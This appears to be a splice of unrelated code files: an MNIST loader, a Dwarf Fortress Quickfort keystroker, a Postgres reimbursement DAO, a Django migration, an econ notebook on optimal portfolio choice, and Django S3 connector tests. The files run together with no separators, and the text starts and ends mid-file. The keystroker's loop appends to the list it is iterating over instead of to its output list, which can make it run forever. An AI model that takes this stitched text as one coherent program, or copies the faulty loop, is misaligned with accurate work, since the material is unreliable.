0 self.data_vector_size = 784 self.label_vector_size = 10 tmp_training_data = np.loadtxt(data_set_path, delimiter=',') tmp_evaluation_data = np.loadtxt(evaluation_set_path, delimiter=',') np.random.shuffle(tmp_training_data) if size_reduction: self.data_vector_size = 196 tr_imgs = tmp_training_data[:,:-1] ev_imgs = tmp_evaluation_data[:,:-1] new_tr_data = np.zeros([len(tmp_training_data), self.data_vector_size + 1]) new_ev_data = np.zeros([len(tmp_evaluation_data), self.data_vector_size + 1]) for i in range(len(tmp_training_data)): new_tr_data[i] = np.concatenate((np.reshape(cv2.resize(np.reshape(tr_imgs[i], (28, 28)), dsize = (14, 14)), 196), tmp_training_data[i,-1:])) for i in range(len(tmp_evaluation_data)): new_ev_data[i] = np.concatenate((np.reshape(cv2.resize(np.reshape(ev_imgs[i], (28, 28)), dsize = (14, 14)), 196), tmp_evaluation_data[i,-1:])) tmp_training_data = new_tr_data tmp_evaluation_data = new_ev_data # Form data in a formation where the first are the actual data and last 10 elements are the labels # The training data is float normalized between 0 and 1, and label data is 1 or 0 self.training_data = np.zeros([len(tmp_training_data), self.data_vector_size + self.label_vector_size]) self.evaluation_data = np.zeros([len(tmp_evaluation_data), self.data_vector_size + self.label_vector_size]) self.training_data[:,:-10] = tmp_training_data[:,1:] self.evaluation_data[:,:-10] = tmp_evaluation_data[:,1:] label_array = np.zeros([len(tmp_training_data), 10]) label_array[range(len(tmp_training_data)), tmp_training_data[:,0].astype(int)] = 1 self.training_data[:,-10:] = label_array self.training_data[:,:-10] /= 255 label_array = np.zeros([len(tmp_evaluation_data), 10]) label_array[range(len(tmp_evaluation_data)), tmp_evaluation_data[:,0].astype(int)] = 1 self.evaluation_data[:,-10:] = label_array self.evaluation_data[:,:-10] /= 255 def get_training_data(self): return self.training_data def get_training_data_without_labels(self): return self.training_data[:,:-10] def get_training_labels(self): return self.training_data[:,-10:] def get_evaluation_data(self): return self.evaluation_data def get_evaluation_data_without_labels(self): return self.evaluation_data[:,:-10] def get_evaluation_labels(self): return self.evaluation_data[:,-10:] def get_validation_data(self, batch_size, validation_set): return self.training_data[:validation_set * batch_size,:-10] def get_validation_labels(self, batch_size, validation_set): return self.training_data[:validation_set * batch_size,-10:] def get_batches(self, batch_size, include_labels = False, validation_set = 0): """ Function for formatting the batches correctly """ batch_amount = int(len(self.get_training_data()) / batch_size) if include_labels: data_set = np.copy(self.get_training_data()) else: data_set = np.copy(self.get_training_data_without_labels()) return np.reshape(data_set, [batch_amount, batch_size, len(data_set[0])])[validation_set:] MWDF Project/MasterworkDwarfFortress/Utilities/Quickfort/src/qfconvert/keystroker.py """Handles conversion from QF keycode lists to keystrokes or DF macros.""" from copy import copy from math import sqrt import os import re import random from filereader import load_json from geometry import Area, Direction, add_points, scale_point, midpoint import exetest import util # load global KEY_LIST which is used liberally below and would be inefficient to constantly reload KEY_LIST = load_json(os.path.join(exetest.get_main_dir(), "config/keys.json")) class KeystrokerError(Exception): """Base class for keystroker errors.""" class Keystroker: """ Computes keycodes needed to go through route and transforms those keycodes into keystrokes or DF macro commands. Returns list keystrokes or DF macro lines. """ def __init__(self, grid, buildconfig): self.grid = grid self.buildconfig = buildconfig def plot(self, plots, cursor): """ Follows the route given by plots, generating the keys necessary to plot/designate those areas in DF. Returns list of keycodes generated and ending cursor position as ([String], Point). """ submenukeys = self.buildconfig.get('submenukeys') last_command = '' last_submenu = '' keys = copy(self.buildconfig.get('init')) or [] completed = self.buildconfig.get('completed') or [] # construct the list of keystrokes required to move to each # successive area and build it for pos in plots: cell = self.grid.get_cell(*pos) command = cell.command endpos = cell.area.opposite_corner(pos) subs = {} # get samecmd or diffcmd depending on if the command is # different from the previous iteration's command if command == last_command: nextcmd = self.buildconfig.get('samecmd', command) or [] else: nextcmd = self.buildconfig.get('diffcmd', command) or [] last_command = command # moveto = keys to move cursor to starting area-corner subs['moveto'] = self.move(cursor, pos) # setsize = keys to set area to desired dimensions setsizefun = getattr(self, self.buildconfig.get('setsize', command)) setsize, newpos = setsizefun(pos, endpos) subs['setsize'] = setsize # look for mat selection syntax like Cw:1 mat_label = None if ':' in command: match = re.search(r'(.+):([\w]+)$', command) if match is None: raise KeystrokerError( 'Invalid characters in material label: ' + command) # split command:mat_label into command and mat_label command = match.group(1) mat_label = match.group(2) # TODO: pitch a fit if we're not in key output mode # subs['setmats'] keys are used to select mats for an area setmatscfg = self.buildconfig.get('setmats', command) if setmatscfg: setmatsfun = getattr(self, setmatscfg) subs['setmats'] = setmatsfun(cell.area.size(), mat_label) # handle submenus use_command = None for k in submenukeys: if re.match(k, command): # this command needs to be called in a DF submenu submenu = command[0] if not last_submenu: # entering a new submenu and not currently in one subs['menu'] = submenu subs['exitmenu'] = [] last_submenu = submenu elif last_submenu != submenu: # switching from one submenu to another subs['exitmenu'] = ['^'] # exit previous submenu subs['menu'] = submenu # enter new menu last_submenu = submenu else: # same submenu subs['menu'] = [] subs['exitmenu'] = [] # drop the submenu key from command use_command = command[1:] continue # no known submenu found in command? if not use_command: if last_submenu: # was in a submenu, now want to be at parent menu subs['exitmenu'] = ['^'] else: # was at root menu and want to continue being there subs['exitmenu'] = [] subs['menu'] = [] last_submenu = '' use_command = command[:] # break command into keycodes codes = split_keystring_into_keycodes(use_command) # substitute keycodes into nextcmd where we find the string 'cmd' nextcodes = [] for c in nextcmd: if c == 'cmd': nextcodes.extend(codes) else: nextcmd.append(c) # nextcodes is now our command-key string subs['cmd'] = nextcodes pattern = self.buildconfig.get('designate', command) newkeys = [] # do pattern subs (and throw away empty elements) for p in pattern: if p in subs: newkeys.extend(subs[p]) else: newkeys.append(p) # add our transformed keys to keys keys.extend(newkeys) # move cursor pos to end corner of built area cursor = newpos # if we're in a submenu, exit it if last_submenu: keys.append('^') # append on-completed keys, if any keys.extend(completed) return (keys, cursor) @staticmethod def get_z_moves(zoffset): """ Get the apprioriate number of > or < chars reflecting zoffset. """ if zoffset > 0: return ['>'] * zoffset if zoffset < 0: return ['<'] * abs(zoffset) return [] def move(self, (x1, y1), (x2, y2), zoffset=0, allowjumps=True): """ Returns list of keycodes needed to move DF cursor from (x1, y1) to (x2, y2) and adjust z-level by zoffset if provided. """ keys = [] # do z-moves first if needed keys += Keystroker.get_z_moves(zoffset) allow_overshoot = True # whether we may overshoot the target coords while x1 != x2 or y1 != y2: # while there are moves left to make.. direction = Direction.get_direction((x1, y1), (x2, y2)) # Get x and y component of distance between start and end dx = abs(x2 - x1) dy = abs(y2 - y1) if dx == 0: steps = dy # moving on y axis only elif dy == 0: steps = dx # moving on x axis only else: # determine max diagonal steps we can take # in this direction without going too far steps = min([dx, dy]) keycode = ['[' + direction.compass + ']'] jumpkeycode = ['[+' + direction.compass + ']'] move = direction.delta() if not allowjumps or steps < 8 or not allow_overshoot: # render single movement keys keys.extend(keycode * steps) (x1, y1) = add_points((x1, y1), scale_point(move, steps)) allow_overshoot = True else: # use DF's move-by-10-units commands jumps = (steps // 10) leftover = steps % 10 jumpmove = scale_point(move, 10) # backtracking optimization if leftover >= 8: # test if jumping an extra 10-unit step # would put us outside of the bounds of # the blueprint (want to prevent) (xt, yt) = add_points((x1, y1), scale_point(jumpmove, (jumps + 1))) if self.grid.is_out_of_bounds(xt, yt): # just move there normally keys.extend(keycode * leftover) (x1, y1) = add_points((x1, y1), scale_point(move, steps)) # don't try to do this next iteration allow_overshoot = False else: # permit overjump/backtracking movement jumps += 1 (x1, y1) = add_points((x1, y1), scale_point(jumpmove, jumps)) allow_overshoot = True else: # move the last few cells needed when using # jumpmoves to land on the right spot keys.extend(keycode * leftover) # keys.append('%') (x1, y1) = add_points((x1, y1), scale_point(move, steps)) allow_overshoot = True if jumps > 0: keys.extend(jumpkeycode * jumps) return keys def setsize_standard(self, start, end): """ Standard sizing mechanism for dig, place, query buildtypes. Returns keys, newpos: keys needed to make the currently-designating area the correct size pos is where the cursor ends up after sizing the area """ return self.move(start, end), end def setsize_build(self, start, end): """ Standard sizing mechanism for the build buildtype. Returns keys, pos: keys needed to make the currently-designating area the correct size pos is where the cursor ends up after sizing the area """ # move cursor halfway to end from start mid = midpoint(start, end) keys = self.move(start, mid) # resize construction area = Area(start, end) keys += ['{widen}'] * (area.width() - 1) keys += ['{heighten}'] * (area.height() - 1) return keys, mid def setsize_fixed(self, start, end): """ Sizing mechanism for fixed size buildings like 3x3 workshops, 5x5 trade depots and 5x5 siege workshops. Here we just move to the center of the building and deploy it. This allows for e.g. a 3x3 grid of 'wc' cells indicating a single carpenter's workshop. Returns keys, pos: keys needed to make the currently-designating area the correct size pos is where the cursor ends up after sizing the area """ # move cursor halfway to end from start mid = midpoint(start, end) keys = self.move(start, mid) return keys, mid def setmats_build(self, areasize, manual_label): """ Returns keycodes needed to select materials for the given int areasize, and either generic material selection or manual(ly assisted) material selection. If manual_label is None, we prefix the "enter mats menu and wait" keycodes and postfix a "wait" to the keys needed to choose the mats. If manual_label is not None, we use {WaitAfterNext} and {SelectMat label count} keycodes for use by QFAHK for entering the material menu and doing manual material selection. """ # generic mat selection if manual_label is None: keys = ['&', '%'] # {Enter}{Wait} if areasize == 1: keys += ['@'] # shift-enter return keys # Tries to avoid running out of a given material type by blithely # attempting to all-select from DF's materials list repeatedly. # qfconvert will attempt this 1+sqrt(areasize) times, which should # be good enough most of the time. reps = 1 if areasize == 1 else 1 + 2 * int(sqrt(areasize)) keys += ['@', '{menudown}'] * (reps - 1) keys += ['%'] # {Wait} at the end return keys # Manually assisted material selection: enter materials menu and # wait for that region of the screen to change, then select manually # chosen material. return ['%>', '&', '{SelectMat %s %d}' % (manual_label, areasize)] def setmats_bridge(self, areasize, manual_label): """ Returns keycodes needed to select materials for the given int areasize; see setmats_build() for basic description. This method differs from setmats_build() in how it determines how many mat units are needed to build bridges, which use a formula of (areasize//4)+1 instead. """ return self.setmats_build(areasize / 4 + 1, manual_label) def convert_keys(keys, mode, title): """ Convert keycodes to desired output, based on mode. Returns string of all keystrokes or of DF macro-content. """ transmode = 'macro' if mode == 'macro' else 'key' keys = translate_keycodes(keys, transmode) if mode == 'macro': return '\n'.join(convert_to_macro(keys, title)) + '\n' elif mode == 'key': return ''.join(keys) elif mode == 'keylist': return ','.join(keys) raise KeystrokerError('Unknown Keystroker.render() mode "%s"' % mode) def translate_keycodes(keycodes, mode): """Translate keycodes based on given output mode.""" return util.flatten([translate_keycode(k, mode) for k in keycodes]) def translate_keycode(keycode, mode): """ Translate a given keycode against keylist and specified mode. Returns translation if one exists, or original keycode otherwise. """ translated = KEY_LIST[mode].get(keycode.lower()) if translated is None: return keycode # no translation available, so pass it through as is return translated # translation made def convert_to_macro(keycodes, title): """Convert keycodes to DF macro syntax (complete macro file contents).""" keybinds = parse_interface_txt( os.path.join(exetest.get_main_dir(), 'config/interface.txt')) if not title: # make up a macro title if one is not provided to us title = '~qf' + str(random.randrange(0, 999999999)) output = [title] # first line of macro is macro title for key in keycodes: if key == '': continue # empty keycode, output nothing elif keybinds.get(key) is None: raise KeystrokerError( "Key '%s' not bound in config/interface.txt" % key) if key == '^': output.append('\t\tLEAVESCREEN') # escape menu key else: output.extend(keybinds[key]) output.append('\tEnd of group') output.append('End of macro') return output def split_keystring_into_keycodes(keystring): """ Breaks str into individual keycodes. Returns a list of keycode strings. """ # prepare to break keystring into keycodes cmdedit = keystring # separate tokens with | chars... cmdedit = re.sub(r'\+\{Enter\}', '|@|', cmdedit) cmdedit = re.sub(r'\{', '|{', cmdedit) cmdedit = re.sub(r'\}', '}|', cmdedit) cmdedit = re.sub(r'\+\&', '|+&|', cmdedit) cmdedit = re.sub(r'\&', '|&|', cmdedit) cmdedit = re.sub(r'\^', '|^|', cmdedit) cmdedit = re.sub(r'\+(\w)', '|1:\\1|', cmdedit) cmdedit = re.sub(r'\!(\w)', '|4:\\1|', cmdedit) cmdedit = re.sub(r'\%wait\%', '|{wait}|', cmdedit) # support QF1.x's %wait% cmdsplit = re.split(r'\|+', cmdedit) # ...and split tokens at | chars. # break into individual keycodes codes = [] for k in cmdsplit: if not k: continue if k[0] == '{': # check for keycodes like {Right 5} match = re.match(r'\{(\w+|[&^+%!]) (\d+)\}', k) if match is None: codes.append(k) # preserve whole key-combos else: # repeat the specified keycode the specified number of times codes.extend(['{' + match.group(1) + '}'] * int(match.group(2))) continue if k[0:2] in ('1:', '4:'): codes.append(k) # preserve Alt/Shift combos as distinct keycodes continue if k[0] in ('&', '^', '+', '%', '!'): codes.append(k) # preserve these as distinct keycodes continue codes.extend(k) # just separate a series of individual keystrokes return codes def parse_interface_txt(path): """ Parse DF-syntax interface.txt. Returns a dictionary with keycodes as keys, whose values are lists of DF macro commands bound to each keycode in interface.txt. """ with open(path) as f: data = f.read() data = util.convert_line_endings(data) groups = [re.split('\n', kb) for kb in re.split(r'\[BIND:', data)] keybinds = copy(KEY_LIST) for kb in groups: if kb == ['']: continue bind = re.sub(r'(\w+):.+', r'\1', kb[0]) keys = [re.sub(r'\[(KEY:|SYM:)(.+?)\]', r'\2', k) for k in kb[1:]] for k in keys: if k == '': continue if keybinds.get(k) is None: keybinds[k] = [] keybinds[k].append('\t\t' + bind) return keybinds backend/daos/reimbursement_dao_postgres.py0 from typing import List from daos.reimbursement_dao import ReimbursementDAO from entities.reimbursement import Reimbursement from utils.connection_util import connection class ReimbursementDAOPostgres(ReimbursementDAO): def create_reimbursement(self, employee_id: int, amount: float, description: str) -> Reimbursement: sql = """insert into reimbursement values (default, %s, %s, %s, 'Pending', '') returning r_id""" cursor = connection.cursor() cursor.execute(sql, [str(employee_id), str(amount), str(description)]) connection.commit() r_id = cursor.fetchone()[0] reimbursement = Reimbursement(r_id, employee_id, amount, description, "Pending", "") return reimbursement def get_reimbursement_by_id(self, r_id: int) -> Reimbursement: sql = """select * from reimbursement where r_id = %s""" cursor = connection.cursor() cursor.execute(sql, [str(r_id)]) record = cursor.fetchall() for r_parts in record: output = Reimbursement(r_parts[0], r_parts[1], r_parts[2], r_parts[3], r_parts[4], r_parts[5]) return output def get_reimbursements_by_employee(self, employee_id: int) -> List[Reimbursement]: sql = """select * from reimbursement where employee_id = %s order by r_id""" cursor = connection.cursor() cursor.execute(sql, [str(employee_id)]) records = cursor.fetchall() r_list = [] for r_parts in records: reimbursement = Reimbursement(r_parts[0], r_parts[1], r_parts[2], r_parts[3], r_parts[4], r_parts[5]) r_list.append(reimbursement) return r_list def get_all_reimbursements(self) -> List[Reimbursement]: sql = """select * from reimbursement order by r_id""" cursor = connection.cursor() cursor.execute(sql) records = cursor.fetchall() r_list = [] for r_parts in records: reimbursement = Reimbursement(r_parts[0], r_parts[1], r_parts[2], r_parts[3], r_parts[4], r_parts[5]) r_list.append(reimbursement) return r_list def approve_reimbursement(self, reimbursement: Reimbursement, message: str) -> Reimbursement: sql = """update reimbursement set status = 'Approved', message = %s where r_id = %s returning employee_id""" cursor = connection.cursor() cursor.execute(sql, (str(message), str(reimbursement.r_id))) connection.commit() return Reimbursement(reimbursement.r_id, reimbursement.employee_id, reimbursement.amount, reimbursement.description, "Approved", message) def deny_reimbursement(self, reimbursement: Reimbursement, message: str) -> Reimbursement: sql = """update reimbursement set status = 'Denied', message = %s where r_id = %s returning employee_id""" cursor = connection.cursor() cursor.execute(sql, (str(message), str(reimbursement.r_id))) connection.commit() return Reimbursement(reimbursement.r_id, reimbursement.employee_id, reimbursement.amount, reimbursement.description, "Denied", message) __all__ = [ "_private_name", ] _private_name = "spam"# Generated by Django 2.0.1 on 2018-02-01 18:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('form', '0001_initial'), ] operations = [ migrations.AlterField( model_name='rating', name='why_realize', field=models.CharField(max_length=1000), ), ] # -*- coding: utf-8 -*- # --- # jupyter: # jupytext: # formats: ipynb,py:percent # notebook_metadata_filter: all # text_representation: # extension: .py # format_name: percent # format_version: '1.2' # jupytext_version: 1.2.3 # kernelspec: # display_name: Python 3 # language: python # name: python3 # language_info: # codemirror_mode: # name: ipython # version: 3 # file_extension: .py # mimetype: text/x-python # name: python # nbconvert_exporter: python # pygments_lexer: ipython3 # version: 3.7.6 # latex_envs: # LaTeX_envs_menu_present: true # autoclose: false # autocomplete: false # bibliofile: biblio.bib # cite_by: apalike # current_citInitial: 1 # eqLabelWithNumbers: true # eqNumInitial: 1 # hotkeys: # equation: Ctrl-E # itemize: Ctrl-I # labels_anchors: false # latex_user_defs: false # report_style_numbering: false # user_envs_cfg: false # --- # %% [markdown] # # Optimal Financial Investment over the Life Cycle # # # # [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/econ-ark/REMARK/master?filepath=REMARKs%2FPortfolioChoiceBlogPost%2FPortfolioChoiceBlogPost.ipynb) # # Economists like to compare actual human behavior to choices that would be made by a "rational" agent who optimally takes into account all the complexities of a decision. # # But for some problems, calculating the optimal choice is remarkably difficult. # # Financial decisions over a lifetime are such a problem. Determining the optimal amount to save for retirement, and how much of your savings to invest in risky assets (like stocks) versus safe assets (like a bank account), turns out to be mathematically **much** harder than calculating how to land the Apollo spacecraft on the moon. In fact, the computational tools that economists use to solve such problems descend directly from those originally developed to optimize Apollo trajectories -- with 50 years of further development. # # By 2005, those tools were finally good enough to give financial advice that deserved to be taken seriously -- if by "taken seriously" we mean that economists's own personal decisions (and the advice they give to friends and family) were influenced by the results. (A 2005 academic paper by [, and Maenhout](https://doi.org/10.1093/rfs/hhi017) is the standard reference.) # # But even today, these tools are not widely used, because it can take years of study to master them. # # In 2015, the U.S. [Consumer Financial Protection Bureau](https://www.consumerfinance.gov) funded the creation of the [Econ-ARK](https://econ-ark.org) open source software project, whose purpose is to make such tools much more accessible, both to scholars and to the wider public. Thanks to subsequent [funding by the Sloan Foundation](https://sloan.org) and the [Think Forward Initiative](https://www.thinkforwardinitiative.com), the Econ-ARK team is proud to announce our newest enhancement: [The `ConsPortfolioModel` tool](https://hark.readthedocs.io/en/latest/example_notebooks/ConsPortfolioModel.html) calculates the optimal solution to a lifetime optimal saving problem where the consumer can choose how much to invest in risky versus safe assets. # # Our hope is that such transparent and publicly available tools will eventually provide an alternative to the proprietary (and mysterious) advice that has become widely available from "robo advisors" in the last few years (and the even more mysterious advice that has been available from human advisors much longer). # %% [markdown] # ## The Problem # # Nobody saving for retirement knows what the future holds. They are likely to change jobs several times during their career, and each new job will have a different profile of income growth and risk; they might develop health problems that cut life short before they reach retirement (so retirement savings would be unnecessary), or they might turn out to be so healthy that they live to 100 (with a danger of outliving their savings). # # Nor does anybody know what the payoffs will be for alternative investment choices. "Risky" assets like stocks have historically earned higher returns than "safe" assets like government bonds -- but there is no guarantee that stocks will outperform bonds over any particular period (like, until you retire). # # Uncertainties like this are why the consumer's problem is so much harder than NASA's. The motion of a spacecraft is predictable: If you point it in a certain direction with a certain velocity, Newton's equations can tell you where it will be far into the future. In contrast, "optimal" behavior over a life that is subject to many risks must prudently take into account all of the possible outcomes. # # "Big data" now allows us to quantify the risks associated with earnings from work: We can measure how often people change jobs at each age (taking into account education, occupation and so on), and we can measure what happens to income after job changes. Job-related income uncertainty can therefore be represented mathematically as a statistical distribution over the many possible future outcomes, and similarly for other kinds of risk (like health risk). When all the biggest individual risks have been quantified, we can calculate the joint probabilities of every conceivable draw, and weight each possible outcome by its probability and its desirability. Finally, we can calculate how the ultimate outcomes (like, retirement income) depend probabilisitcally on the current choice of saving and portfolio choice, and determine which choices would be "optimal" (in the sense of being the best available gamble) for consumers with different preferences (toward risk, for example). # # %% [markdown] # ## The Solution # # ### Replicating the Standard Model # # Our first use of `ConsPortfolioModel` has been to replicate the results of the above-mentioned 2005 paper (by , and Maenhout - "CGM" for short). # # A key input is the degree of consumers' ["risk aversion."](https://en.wikipedia.org/wiki/Risk_aversion) Researchers have found that many kinds of consumer behavior are consistent with values of ["relative risk aversion"](https://en.wikipedia.org/wiki/Risk_aversion#Relative_risk_aversion) in the range from 2 to 4. # # The most striking conclusion of the CGM paper is captured in the figure below. We assume that consumers with risk aversion of 3 can choose between a "risky" asset with expected performance (for risk and return) like the stock market, versus a "safe" asset with lower expected returns historically typical of safe assets. The figure shows, by age, the optimal risky share -- that is, the optimal proportion of savings that it would be optimal to invest in the "risky" asset. The fact that the proportion is stuck at 1.0 at every age means that the computer says the optimal choice is always to invest 100 percent of your savings in stocks! # #
# #
#
# Figure 1: Portfolio Choice for Moderately Risk Averse Consumer # #
# # # # %% [markdown] # Of course, what you believe about your optimal portfolio share in the risky asset depends on your _perception_ of the degree of riskiness and your _beliefs_ about the average extra return stocks will yield over the long run (the "equity premium"). # # The model assumes that people expect an equity premium of 4 percent, which is [a good estimate](http://breesefine7110.tulane.edu/wp-content/uploads/sites/110/2015/10/Perspectives-on-the-Equity-Risk-Premium-Siegel.pdf) of what the average premium has been on stock market investments in the developed world over the past century. (Risk is also assumed to match the historical average.) # # The model's conclusion is that for values of risk aversion that accurately capture people's risk-related choices in other contexts, an equity premium of 4 percent is more than enough to compensate any rational agent for bearing the risk that has typically been associated with stock returns. # %% [markdown] # ## Maybe Risk Aversion is Much Greater than 3? # # Parameters like "relative risk aversion" are slippery things to measure. Maybe the conventional choice of around 3, which works well to explain other choices, is inappropriate here -- maybe people just hate stock market risk much more than other kinds of risk that would have similar financial consequences. # # The next figure shows the profile of the mean risky share for a consumer with risk aversion of 6, twice the conventional value. (Such a prudent person would be like your most risk averse neighbor or relative). # # Even with such high risk aversion, the model says that until about age 35 it is still optimal to invest all of your savings in the stock market. After that, the risky share declines gradually until it stabilizes at around 65 percent at age 65. (The dashing lines show the choices made by people at the 5th and 95th percentiles of the distribution of the risky share). # # These results reflect two aspects of the model: # 1. Young people start with little or no assets # * Their income comes mostly from working in the labor market # * If you have only a small amount of wealth, the absolute dollar size of the risk you are taking by investing your (modest) retirement savings in the stock market is small, so the higher expected returns more than make up for the (small) risk # 1. By the age of retirement, you plan to finance a lot of your future spending from your savings # * So, investing everything in the stock market would put a large proportion of your retirement spending at risk # * The "equity premium" is nevertheless large enough to make it worthwhile for most people to keep half or more of their assets in stocks # # #
# #
#
# Figure 2: Portfolio Choice for Highly Risk Averse Consumer # #
# # %% [markdown] # ## What Do People Actually Do? # # The pattern above is strikingly different from the actual choices that typical savers make. # # The figure below shows data, from the Federal Reserve's triennial [_Survey of Consumer Finances_](https://en.wikipedia.org/wiki/Survey_of_Consumer_Finances), for the proportion of their assets that people at different ages actually have invested in stocks and other risky assets, taken from [this article](https://www.stlouisfed.org/publications/regional-economist/fourth-quarter-2018/role-age-investment-mix). # # The the risky share that people choose in the real life is much lower than the model says is optimal (even with extreme risk aversion of 6). # # Below we examine two possible interpretations: # 1. The model is basically the right framework for thinking about these questions # * But some of its assumptions/calibrations are wrong # 1. People _are_ behaving optimally, but the model is still missing some important features of reality # #
# #
# # # # %% [markdown] # ### What Assumptions Might Be Wrong? # # # %% [markdown] # #### Maybe People Are Pessimistic About the Equity Premium # # While [4 percent is a reasonable estimate of what the equity premium has been in the past](http://www.globalfinancialdata.com/the-equity-risk-premium/), it is possible that most people do not _expect_ such a high equity premium (and never have expected it). # # The figure below shows the consequences if highly risk averse people believe the equity premium will be only two percent (which is around its historical average in the U.S. before 1941, and which [some resepected economists](https://jpm.pm-research.com/content/26/1/10.abstract) think might prevail in the future). # # The shape of the figure is much the same as before; in particular, the youngest people still hold 100 percent of their portfolios in risky assets. But the proportion of their portfolios that middle-aged and older people hold in stocks falls from about 50 to about 20 percent. # #
# #
#
# Figure 3: Pessimistic and Highly Risk Averse Consumer # #
# # # # # %% [markdown] # #### Is Pessimism Enough? # # The preceding figure assumes that relative risk aversion is very high (6). A natural question is whether, when people are pessimistic about the equity premium, their optimal portfolio shares might be low even at a less extreme degree of risk aversion. # # Nope. The figure below shows that, even with pessimistic beliefs about the equity premium, if relative risk aversion has a conventional value of 3 then the optimal risky share is still 100 percent for both young and old people, and on average reaches a low point of about 90 percent for people nearing retirement. # # #
# #
#
# Figure 4: Pessimistic and Moderately Risk Averse Consumer # #
# # # %% [markdown] # ### Comparison to Professional Advice # %% [markdown] # Investment advisors sometimes advocate the "100 minus age" rule, which says that the percentage of your portfolio in risky assets should be equal to 100 minus your age; so, a 60 year old would have 40 percent in stocks. # # For people before retirement, the rule's recommendation is somewhat not too different from the shape that comes out of the model (assuming high risk aversion). While the rule would say that the 25 year old should put 75 percent of their savings in the stock market and the model says 100 percent, they agree that the young person's proportion should be high, and also agree that the proportion should decline during working life. # # But the rule and the model disagree about what should happen after retirement. The rule recommends steadily reducing your exposure to risky assets as you get older, while the model says that after retirement your exposure should remain at about the same level as late in your working life. # # Financial advisors, who have daily contact with real human beings, may have an insight that the model does not incorporate: Perhaps risk aversion increases with age. # # Risk aversion is remarkably difficult to measure, and economists' efforts to determine whether it increases with age have been inconclusive, with some studies finding [evidence for an increase](https://voxeu.org/article/effect-age-willingness-take-risks) (at least during working life) and others finding [little increase](https://onlinelibrary.wiley.com/doi/abs/10.1016/j.rfe.2003.09.010). # # For technical reasons, it is somewhat difficult to model risk aversion that varies directly with age. But your willingness to invest in risky assets depends on both your degree of aversion to risk and your perception of the size of the risk. So a backdoor way to examine the consequences of rising risk aversion with age is to assume that the perceived riskiness of stock investments goes up with age. # # That is what is done in the figure below: We assume that the perceived riskiness of stock market investment doubles between age 65 and age 100. The result now looks more like the advice of financial advisors: Increasing _perceived_ risk as you get older persuades you to invest less in risky assets. # # This figure suggests that the "100 minus age" rule is not too bad as an approximation of what an extremely risk averse person might want to do -- if they become more and more fearful of risk after retirement. # #
# #
#
# Figure 5: 100 Minus Age Rule vs Optimizing Highly Risk Averse Consumer # #
# # # %% [markdown] # ### Other Experiments # # Many other experiments are possible in the framework (as you can discover yourself by downloading the tool; see below), but the conclusion is always the same: Even if people expect that stock returns in the future will be substantially lower than they have been in the past, for most people most of the time, the return on stock market investments more than compensates for any reasonable degree of risk aversion. # %% [markdown] # #### What Might Still Be Missing # # Some experiments are NOT yet possible with our toolkit. Perhaps the most important is that we have no way to take into account the risks entailed in homeownership. Houses, like stocks, are assets whose price can go up or down. Since housing wealth constitutes the majority of the wealth of most consumers, the model's failure to take into account the effects that homeownership should have on the optimal choice of risky investment in other (non-housing) forms is a serious enough failing to call into question the soundness of its conclusions. # # The Think Forward Initiative grant that funded this work has a second component: The addition of a realistic treatment of the effects of home ownership on the optimal share of financial investment in risky assets. This is a question that is at the frontier of what is possible using the kinds of tools we are developing. We are interested to see whether a proper treatment of homeownership will be enough to temper the recommendations of the model to invest heavily in other risky assets. The answer is not clear -- which is why we need a model! # %% [markdown] # #### Code # # The computer code to reproduce all of the figures in this notebook, and a great many others, can be executed by [installing](https://github.com/econ-ark/HARK/#install) the [Econ-ARK toolkit](https://github.com/econ-ark/HARK/#readme) and cloning the [REMARK](https://github.com/econ-ark/REMARK) repository. The small unix program `do_all_code.sh` at the root level of the [REMARKs/PortfolioChoiceBlogPost](https://github.com/econ-ark/REMARK/blob/master/REMARKs/PortfolioChoiceBlogPost/do_all_code.sh) directory produces everything. # # A replication of main results of the CGM paper is referenced in a link below. # # The [Econ-ARK](https://github.com/econ-ark) toolkit is available at GitHub, and [the `ConsPortfolioModel`](https://github.com/econ-ark/HARK/blob/master/HARK/ConsumptionSaving/ConsPortfolioModel.py) is [documented here](https://hark.readthedocs.io/en/latest/example_notebooks/ConsPortfolioModel.html). # %% [markdown] # #### References # # ., ., & . (2005). Consumption and portfolio choice over the life cycle. The Review of Financial Studies, 18(2), 491-533. [doi.org/10.1093/rfs/hhi017](https://doi.org/10.1093/rfs/hhi017) # # Velásquez-Giraldo, Mateo and . Replication of Cocco, Gomes, and Maenhout (2005). [REMARK](https://github.com/econ-ark/REMARK/blob/master/REMARKs/CGMPortfolio/Code/Python/CGMPortfolio.ipynb) from unittest import skip import boto3 from django import test from django.core.exceptions import ValidationError from django.urls import reverse from moto import mock_s3, mock_sts from hexa.catalog.models import Index from hexa.plugins.connector_s3.models import ( Bucket, BucketPermission, BucketPermissionMode, Credentials, Object, ) from hexa.user_management.models import Membership, Team, User class ConnectorS3Test(test.TestCase): @classmethod def setUpTestData(cls): cls.team = Team.objects.create(name="Test Team") cls.user_jim = User.objects.create_user( "", "regular", is_superuser=True, ) Membership.objects.create(team=cls.team, user=cls.user_jim) cls.api_credentials = Credentials.objects.create( username="app-iam-username", access_key_id="FOO", secret_access_key="BAR", default_region="us-west-2", user_arn="test-user-arn-arn-arn", app_role_arn="test-app-arn-arn-arn", ) cls.bucket = Bucket.objects.create(name="test-bucket") BucketPermission.objects.create(team=cls.team, bucket=cls.bucket) @skip("Deactivated for now - mocks needed") def test_credentials_200(self): self.client.login(email="", password="") response = self.client.post(reverse("notebooks:credentials")) self.assertEqual(response.status_code, 200) response_data = response.json() self.assertIn("username", response_data) self.assertEqual("", response_data["username"]) self.assertIn("env", response_data) self.assertEqual( { "S3_TEST_bucket_bucket_NAME": "test-bucket", "S3_TEST_bucket_ACCESS_KEY_ID": "FOO", "S3_TEST_bucket_SECRET_ACCESS_KEY": "BAR", }, response_data["env"], ) def test_bucket_delete(self): """Deleting a bucket should delete its index as well""" bucket = Bucket.objects.create(name="some-bucket") bucket_id = bucket.id self.assertEqual(1, Index.objects.filter(object_id=bucket_id).count()) bucket.delete() self.assertEqual(0, Index.objects.filter(object_id=bucket_id).count()) @mock_s3 @mock_sts def test_bucket_clean_ok(self): s3_client = boto3.client("s3", region_name="us-east-1") s3_client.create_bucket(Bucket="some-bucket") bucket = Bucket.objects.create(name="some-bucket") self.assertIsNone(bucket.clean()) @mock_s3 @mock_sts def test_bucket_clean_ko(self): s3_client = boto3.client("s3", region_name="us-east-1") s3_client.create_bucket(Bucket="some-bucket") bucket = Bucket.objects.create(name="huh-wrong-bucket-name") with self.assertRaises(ValidationError): bucket.clean() class 